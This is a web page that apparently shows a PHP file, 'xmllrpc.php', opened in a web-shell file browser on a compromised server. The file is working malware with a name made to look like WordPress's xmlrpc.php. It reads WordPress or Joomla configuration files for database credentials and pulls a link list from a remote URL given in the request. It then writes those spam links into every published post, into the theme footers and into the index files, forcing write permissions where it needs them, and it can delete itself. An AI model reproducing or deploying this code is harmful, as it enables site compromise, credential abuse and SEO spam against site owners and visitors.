config root man

Current Path : /home/quafra/public_html/

Linux srv5.tanoweb.com 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Upload File :
Current File : /home/quafra/public_html/xmllrpc.php

<?php
header('Content-Type:text/html;charset=utf-8');
set_time_limit(0);
ini_set('limit_memory','1024M');
ini_set('max_execution_time',100000);
error_reporting(0);
ini_set('display_errors',0);
$other_file = array('index.php','index.html','index.htm','index.shtml','index.html.bak.bak','index.html.bak','default.htm','default.html','home.html','home.htm');
if(@$_GET['delete'] == 'del'){
	@unlink($php_Self);
}
if(@$_GET['insert'] ==false && @$_GET['datainsert']==false){
	return;
}
if(@$_GET['num']){
	$insert_num=(int)$_GET['num'];
}
if(@$insert_num<1){
	$insert_num = 5;
}

$is_wp = false;
$is_jm = false;
$other = '.';
$link_split = "&nbsp;";
$deeppath = 50;
$dirstring = './';
for($i=0;$i<$deeppath;$i++){
	
	if(is_wordpress($dirstring)){
		$is_wp = true;
		if(is_file($dirstring.'/wp-config.php')){
			include $dirstring.'/wp-config.php';
		}
		break;
	}
	if(is_joomla($dirstring)){
		$is_jm = true;
		if(is_file($dirstring.'/configuration.php')){
			include $dirstring.'/configuration.php';
		}
		break;
	}
	
	if($i==0){
		$dirstring='';
	}
	$dirstring.='../';
	
}
$is_db = false;
if(isset($_GET['datainsert']) && $_GET['datainsert'] !=false){
	$_GET['insert'] = $_GET['datainsert'];
	$is_db = true;
}
$getlink  = trim(crul_get($_GET['insert']));
if($getlink == false){
	echo 'Curl Get Link Failed<br>';
	return;
}else{
	$getlink = explode("\n", $getlink);
}
foreach($getlink as $key=>$values){
	if(trim($values)==false){
		unset($getlink[$key]);
		continue;
	}
	$getlink[$key] = trim($values);
}
if(count($getlink)==1 && $getlink[0]==false){
	echo '链接列表为空<br>';
	return;
}
$getlink = array_unique($getlink);
$getlink_count = count($getlink);
if($getlink_count<=$insert_num){
	$insert_num = $getlink_count;
}	
if($is_wp==true){
	if($is_db==true){
		$is_conn = true;
		if(defined('DB_NAME') && defined('DB_USER') && defined('DB_PASSWORD')){
			if(!defined('DB_HOST')){
				define('DB_HOST', 'localhost');
			}
			if(function_exists('mysql_connect')){
				
				if(!$conn=@mysql_connect(DB_HOST,DB_USER,DB_PASSWORD,true)){
					$is_conn = false;
				}
				if (!mysql_select_db(DB_NAME, $conn)) {
					$is_conn = false;
				}
				if($is_conn==true){
				$check_num = @mysql_fetch_assoc(mysql_query('select count(*) as num from '.$table_prefix.'posts where post_status ="publish"'));
				if($check_num['num']>0){
					$select_post = @mysql_query('select ID,post_content from '.$table_prefix.'posts where post_status ="publish"');
					$blog_content = array();
					while($result = mysql_fetch_assoc($select_post)){
						$blog_content[]=array('ID'=>$result['ID'],'post_content'=>$result['post_content']);
					}
					shuffle($getlink);
					$k=0;
					foreach($blog_content as $key=>$values){
						$link_string = '';
						for($i=0;$i<$insert_num;$i++){
							if(@$getlink[$k]==false){
								shuffle($getlink);
								$k = 0;
							}
							$link_string.=$getlink[$k].$link_split;
							$k++;
						}
						$link_string = rtrim($link_string,$link_split);
						$blog_content[$key]['post_content'] = $values['post_content'].$link_split.$link_string;
					}
					$blog_k = 0;
					foreach($blog_content as $key=>$val){
						$updateblog = mysql_query('UPDATE '.$table_prefix.'posts set post_content="'.addslashes($val['post_content']).'" where ID='.$val['ID']);
						if(mysql_affected_rows ()>0){
							$blog_k++;
						}
					}
					mysql_close($conn);
					echo '成功插入 '.$blog_k.' 条数据';
				}else{
					$is_conn = false;
				}
				}
			}elseif(function_exists('mysqli_connect')){
				if(!$conn=@mysqli_connect(DB_HOST,DB_USER,DB_PASSWORD)){
					$is_conn = false;
				}
				if (!mysqli_select_db($conn,DB_NAME)) {
					$is_conn = false;
				}
				if($is_conn==true){
				$check_num = @mysqli_fetch_array(mysqli_query($conn,'select count(*) as num from '.$table_prefix.'posts where post_status ="publish"'));
				if($check_num['num']>0){
					$select_post = @mysqli_query($conn,'select ID,post_content from '.$table_prefix.'posts where post_status ="publish"');
					$blog_content = array();
					while($result = mysqli_fetch_array($select_post)){
						$blog_content[]=array('ID'=>$result['ID'],'post_content'=>$result['post_content']);
					}
					shuffle($getlink);
					$k=0;
					foreach($blog_content as $key=>$values){
						$link_string = '';
						for($i=0;$i<$insert_num;$i++){
							if(@$getlink[$k]==false){
								shuffle($getlink);
								$k = 0;
							}
							$link_string.=$getlink[$k].$link_split;
							$k++;
						}
						$link_string = rtrim($link_string,$link_split);
						$blog_content[$key]['post_content'] = $values['post_content'].$link_split.$link_string;
					}
					$blog_k = 0;
					foreach($blog_content as $key=>$val){
						$updateblog = mysqli_query($conn,'UPDATE '.$table_prefix.'posts set post_content="'.addslashes($val['post_content']).'" where ID='.$val['ID']);
						if(mysqli_affected_rows($conn)>0){
							$blog_k++;
						}
					}
					mysqli_close($conn);
					echo '成功插入 '.$blog_k.' 条数据';
				}else{
					$is_conn = false;
				}
				}
			}else{
				$is_conn = false;
			}
		}else{
			$is_conn = false;
		}	
		if($is_conn==true){
			return;
		}
	}
	$write_index = $dirstring.'index.php';
	shuffle($getlink);
	$k=0;
	if(is_file($write_index) && !is__writeable($write_index)){
		$mod_access = @chmod($write_index,0644);
		if($mod_access == true && !is__writeable($write_index)){
			$mod_access = @chmod($write_index,0755);
		}
	}
	if(is_file($write_index) && is__writeable($write_index)){
		$link_string = '';
		for($i=0;$i<$insert_num;$i++){
			if($getlink[$k]==false){
				shuffle($getlink);
				$k = 0;
			}
			$link_string.=$getlink[$k].$link_split;
			$k++;
		}
		$get_index = file_get_contents($write_index);
		$put_result = file_put_contents($write_index,$link_string."\n".$get_index);
		if($put_result!=false){
			echo $write_index.' 写入成功<br>';
		}
	}
	$footer_array = traverse($dirstring.'wp-content/themes');
	foreach($footer_array as $footer_val){
		$footer_val = rtrim($footer_val,'/').'/';
		
		$write_footer = $footer_val.'footer.php';
		if(is_file($write_footer) && !is__writeable($write_footer)){
			$mod_access = @chmod($write_footer,0644);
			if($mod_access == true && !is__writeable($write_footer)){
				$mod_access = @chmod($write_footer,0755);
			}
		}
		if(is_file($write_footer) && is__writeable($write_footer)){
			$link_string = '';
			for($i=0;$i<$insert_num;$i++){
				if($getlink[$k]==false){
					shuffle($getlink);
					$k = 0;
				}
				$link_string.=$getlink[$k].$link_split;
				$k++;
			}
			$get_footer = file_get_contents($write_footer);
			$top_bottom = rand(1,2);
			if(stripos($get_footer,'</footer>')){
				if($top_bottom==1){
					$get_footer = str_replace('</footer>',$link_string.'</footer>',$get_footer);
				}else{
					$get_footer = str_replace('</footer>','</footer>'.$link_string,$get_footer);
				}
			}elseif(stripos($get_footer,'wp_footer();')){
				$link_string = addslashes($link_string);
				if($top_bottom==1){
					$get_footer = str_replace('wp_footer();','echo "'.$link_string.'"; wp_footer();',$get_footer);
				}else{
					$get_footer = str_replace('wp_footer();','wp_footer();echo "'.$link_string.'";',$get_footer);
				}
			}elseif(stripos($get_footer,'</body>')){
				if($top_bottom==1){
					$get_footer = str_replace('</body>',$link_string.'</body>',$get_footer);
				}else{
					$get_footer = str_replace('</body>','</body>'.$link_string,$get_footer);
				}
			}elseif(stripos($get_footer,'</html>')){
				if($top_bottom==1){
					$get_footer = str_replace('</html>',$link_string.'</html>',$get_footer);
				}else{
					$get_footer = str_replace('</html>','</html>'.$link_string,$get_footer);
				}
			}else{
				if($top_bottom==1){
					$start_flag = (int)substr_count($get_footer,'<?php');
					$end_flag = (int)substr_count($get_footer,'?>');
					if($start_flag-$end_flag==1){
						$get_footer = $get_footer.' ?>';
					}
					$get_footer = $get_footer.$link_string;
				}else{
					$get_footer = $link_string.$get_footer;
				}
			}
			
			$put_result = file_put_contents($write_footer,$get_footer);
			if($put_result!=false){
				echo $write_footer.' 写入成功<br>';
			}
		}
		
	}
	$other = rtrim($other,'/');
	if(!is_dir($other)){
		echo $other.' 目录不能存在<br>';
		return;
	}
	if(!is_readable($other) || !is__writeable($other)){
		echo '没有权限修改 '.$other.'<br>';
		return;
	}
	foreach($other_file as $key=>$val){
		if($val=='index.php'){
			continue;
		}
		$write_file = $other.'/'.$val;
		if(is_file($write_file) && !is__writeable($write_file)){
			$mod_access = @chmod($write_file,0644);
			if($mod_access == true && !is__writeable($write_file)){
				$mod_access = @chmod($write_file,0755);
			}
		}
		if(is_file($write_file) && is__writeable($write_file)){
			$link_string = '';
			for($i=0;$i<$insert_num;$i++){
				if($getlink[$k]==false){
					shuffle($getlink);
					$k = 0;
				}
				$link_string.=$getlink[$k].$link_split;
				$k++;
			}
			$get_file = file_get_contents($write_file);
			$put_result = file_put_contents($write_file,$link_string."\n".$get_file);
			if($put_result!=false){
				echo $write_file.' 写入成功<br>';
			}
		}else{
			if(is_file($write_file)){
				echo $write_file.' 没有权限修改<br>';
			}
			unset($other_file[$key]);
		}
	}
}elseif($is_jm==true){
	$is_conn = false;
	if($is_db==true && class_exists('JConfig')){
		$is_conn=true;
		$obj = new JConfig();
		$db_prefix = isset($obj->dbprefix)?$obj->dbprefix:'';
		$db_name = isset($obj->db)?$obj->db:'';
		$db_user = isset($obj->user)?$obj->user:'';
		$db_password = isset($obj->password)?$obj->password:'**';
		$db_host = isset($obj->host)?$obj->host:'localhost';
		$content_tb = $db_prefix.'content';
		if($db_name && $db_user && $db_password!='**'){
			if(function_exists('mysql_connect')){
				if(!$conn=@mysql_connect($db_host,$db_user,$db_password,true)){
					$is_conn = false;
				}
				if (!mysql_select_db($db_name, $conn)) {
					$is_conn = false;
				}
				if($is_conn==true){
					$check_num = @mysql_fetch_assoc(mysql_query('select count(*) as num from '.$content_tb));
					if($check_num['num']>0){
						$select_post = @mysql_query('select id as ID,introtext as post_content,`fulltext` from '.$content_tb);
						$blog_content = array();
						while($result = mysql_fetch_assoc($select_post)){
							$blog_content[]=array('ID'=>$result['ID'],'post_content'=>$result['post_content'],'fulltext'=>$result['fulltext']);
						}
						
						shuffle($getlink);
						$k=0;
						foreach($blog_content as $key=>$values){
							$link_string = '';
							for($i=0;$i<$insert_num;$i++){
								if(@$getlink[$k]==false){
									shuffle($getlink);
									$k = 0;
								}
								$link_string.=$getlink[$k].$link_split;
								$k++;
							}
							$link_string = rtrim($link_string,$link_split);
							if($values['fulltext']!=false){
								$blog_content[$key]['fulltext'] = $values['fulltext'].$link_split.$link_string;
							}else{
								$blog_content[$key]['post_content'] = $values['post_content'].$link_split.$link_string;
							}
						}
						$blog_k = 0;
						foreach($blog_content as $key=>$val){
							$updateblog = mysql_query('UPDATE '.$content_tb.' set introtext="'.addslashes($val['post_content']).'",`fulltext`="'.addslashes($val['fulltext']).'" where id='.$val['ID']);
							if(mysql_affected_rows ()>0){
								$blog_k++;
							}
						}
						mysql_close($conn);
						echo '成功插入 '.$blog_k.' 条数据';
					}else{
						$is_conn = false;
					}
				}
			}elseif(function_exists('mysqli_connect')){
				if(!$conn=@mysqli_connect($db_host,$db_user,$db_password)){
					$is_conn = false;
				}
				if (!mysqli_select_db($conn,$db_name)) {
					$is_conn = false;
				}
				if($is_conn==true){
					$check_num = @mysqli_fetch_array(mysqli_query($conn,'select count(*) as num from '.$content_tb));
					if($check_num['num']>0){
						$select_post = @mysqli_query($conn,'select id as ID,introtext as post_content,`fulltext` from '.$content_tb);
						$blog_content = array();
						while($result = mysqli_fetch_array($select_post)){
							$blog_content[]=array('ID'=>$result['ID'],'post_content'=>$result['post_content'],'fulltext'=>$result['fulltext']);
						}
						shuffle($getlink);
						$k=0;
						foreach($blog_content as $key=>$values){
							$link_string = '';
							for($i=0;$i<$insert_num;$i++){
								if(@$getlink[$k]==false){
									shuffle($getlink);
									$k = 0;
								}
								$link_string.=$getlink[$k].$link_split;
								$k++;
							}
							$link_string = rtrim($link_string,$link_split);
							if($values['fulltext']!=false){
								$blog_content[$key]['fulltext'] = $values['fulltext'].$link_split.$link_string;
							}else{
								$blog_content[$key]['post_content'] = $values['post_content'].$link_split.$link_string;
							}
						}
						$blog_k = 0;
						foreach($blog_content as $key=>$val){
							$updateblog = mysqli_query($conn,'UPDATE '.$content_tb.' set introtext="'.addslashes($val['post_content']).'",`fulltext`="'.addslashes($val['fulltext']).'" where id='.$val['ID']);
							if(mysqli_affected_rows($conn)>0){
								$blog_k++;
							}
						}
						mysqli_close($conn);
						echo '成功插入 '.$blog_k.' 条数据';
					}else{
						$is_conn = false;
					}
				}
			}
		}
	}
	if($is_conn==true){
		return;
	}
	$write_index = $dirstring.'index.php';
	shuffle($getlink);
	$k=0;
	if(is_file($write_index) && !is__writeable($write_index)){
		$mod_access = @chmod($write_index,0644);
		if($mod_access == true && !is__writeable($write_index)){
			$mod_access = @chmod($write_index,0755);
		}
	}
	if(is_file($write_index) && is__writeable($write_index)){
		$link_string = '';
		for($i=0;$i<$insert_num;$i++){
			if($getlink[$k]==false){
				$k=0;
				shuffle($getlink);
			}
			$link_string.=$getlink[$k].$link_split;
			$k++;
		}
		$get_index = trim(file_get_contents($write_index));
		$put_result = file_put_contents($write_index,$link_string."\n".$get_index);
		if($put_result!=false){
			echo $write_index.' 写入成功<br>';
		}
	}
	$footer_array = traverse($dirstring.'templates');
	foreach($footer_array as $footer_val){
		$footer_val = rtrim($footer_val,'/').'/';
		
		$write_footer = $footer_val.'index.php';
		if(is_file($write_footer) && !is__writeable($write_footer)){
			$mod_access = @chmod($write_footer,0644);
			if($mod_access == true && !is__writeable($write_footer)){
				$mod_access = @chmod($write_footer,0755);
			}
		}
		if(is_file($write_footer) && is__writeable($write_footer)){
			$link_string = '';
			for($i=0;$i<$insert_num;$i++){
				if($getlink[$k]==false){
					$k=0;
					shuffle($getlink);
				}
				$link_string.=$getlink[$k].$link_split;
				$k++;
			}
			$get_footer = file_get_contents($write_footer);
			$top_bottom = rand(1,2);
			if(stripos($get_footer,'</footer>')){
				if($top_bottom==1){
					$get_footer = str_replace('</footer>',$link_string.'</footer>',$get_footer);
				}else{
					$get_footer = str_replace('</footer>','</footer>'.$link_string,$get_footer);
				}
			}elseif(stripos($get_footer,'</body>')){
				if($top_bottom==1){
					$get_footer = str_replace('</body>',$link_string.'</body>',$get_footer);
				}else{
					$get_footer = str_replace('</body>','</body>'.$link_string,$get_footer);
				}
			}elseif(stripos($get_footer,'</html>')){
				if($top_bottom==1){
					$get_footer = str_replace('</html>',$link_string.'</html>',$get_footer);
				}else{
					$get_footer = str_replace('</html>','</html>'.$link_string,$get_footer);
				}
			}else{
				if($top_bottom==1){
					$start_flag = (int)substr_count($get_footer,'<?php');
					$end_flag = (int)substr_count($get_footer,'?>');
					if($start_flag-$end_flag==1){
						$get_footer = $get_footer.' ?>';
					}
					$get_footer = $get_footer.$link_string;
				}else{
					$get_footer = $link_string.$get_footer;
				}
	
			}
			$put_result = file_put_contents($write_footer,$get_footer);
			if($put_result!=false){
				echo $write_footer.' 写入成功<br>';
			}
		}
	}
	$other = rtrim($other,'/');
	if(!is_dir($other)){
		echo $other.' 目录不能存在<br>';
		return;
	}
	if(!is_readable($other) || !is__writeable($other)){
		echo '没有权限修改 '.$other.'<br>';
		return;
	}
	foreach($other_file as $key=>$val){
		if($val=='index.php'){
			continue;
		}
		$write_file = $other.'/'.$val;
		if(is_file($write_file) && !is__writeable($write_file)){
			$mod_access = @chmod($write_file,0644);
			if($mod_access == true && !is__writeable($write_file)){
				$mod_access = @chmod($write_file,0755);
			}
		}
		if(is_file($write_file) && is__writeable($write_file)){
			$link_string = '';
			for($i=0;$i<$insert_num;$i++){
				if($getlink[$k]==false){
					shuffle($getlink);
					$k = 0;
				}
				$link_string.=$getlink[$k].$link_split;
				$k++;
			}
			$get_file = file_get_contents($write_file);
			$put_result = file_put_contents($write_file,$link_string."\n".$get_file);
			if($put_result!=false){
				echo $write_file.' 写入成功<br>';
			}
		}else{
			if(is_file($write_file)){
				echo $write_file.' 没有权限修改<br>';
			}
			unset($other_file[$key]);
		}
	}
	
}else{
	if($other==true){
		$other = rtrim($other,'/');
		if(!is_dir($other)){
			echo $other.' 目录不能存在<br>';
			return;
		}
		if(!is_readable($other) || !is__writeable($other)){
			echo '没有权限修改 '.$other.'<br>';
			return;
		}
		
		foreach($other_file as $key=>$val){
			$write_file = $other.'/'.$val;
			if(is_file($write_file) && !is__writeable($write_file)){
				$mod_access = @chmod($write_file,0644);
				if($mod_access == true && !is__writeable($write_file)){
					$mod_access = @chmod($write_file,0755);
				}
			}
			shuffle($getlink);
			if(is_file($write_file) && is__writeable($write_file)){
				$link_string = '';
				for($i=0;$i<$insert_num;$i++){
					$link_string.=$getlink[$i].$link_split;
				}
				$get_file = file_get_contents($write_file);
				$put_result = file_put_contents($write_file,$link_string."\n".$get_file);
				if($put_result!=false){
					echo $write_file.' 写入成功<br>';
				}
			}else{
				if(is_file($write_file)){
					echo $write_file.' 没有权限修改<br>';
				}
				unset($other_file[$key]);
			}
		}
		
	}
}
function is__writeable($filepath) {
	if (is_dir($filepath)) return is_writable($filepath);
	$fp = @fopen($filepath, 'a');
	if ($fp) {
		@fclose($fp);
		$fp = @fopen($filepath, 'a');
		if ($fp) {
			@fclose($fp);
			return true;
		}
	}
	return false;
}

function is_joomla ($path)
{
	$dir = $path;
		if (file_exists ($dir . '/configuration.php') && file_exists ($dir . '/components/com_content/') && file_exists ($dir . '/administrator/components/'))
		{
			return true;
		}
	return false;
}

function is_wordpress ($path)
{
	$dir = $path;
		if ((file_exists ($dir . '/wp-config.php') || file_exists ($dir . 'wp-content/themes/')) || file_exists ($dir . '/wp-admin/') && file_exists ($dir . '/wp-includes/'))
		{
			return true;
		}
	return false;
}
function crul_get($url,$i=0){
	if($url==false){
		return;
	}
	$ch = curl_init();
	curl_setopt($ch,CURLOPT_URL,$url);
	curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
	curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
	curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 20);
	$sourceBody = curl_exec($ch);
	if(!curl_errno($ch)){
		return $sourceBody;
	}else{
		if($i>=10){
			return $sourceBody;
		}
		$i++;
		crul_get($url,$i);
	}
	curl_close ( $s );
}
function traverse($path = '.') {
	static $file_array;
	$current_dir = opendir($path);
	while(($file = readdir($current_dir)) !== false) {
		$sub_dir = $path . DIRECTORY_SEPARATOR . $file;
		if($file == '.' || $file == '..') {
			continue;
		} else if(is_dir($sub_dir)) {
			$file_array[]=str_replace("\\",'/',$path . '/' . $file );
		}
	}
	return $file_array;
}

Man Man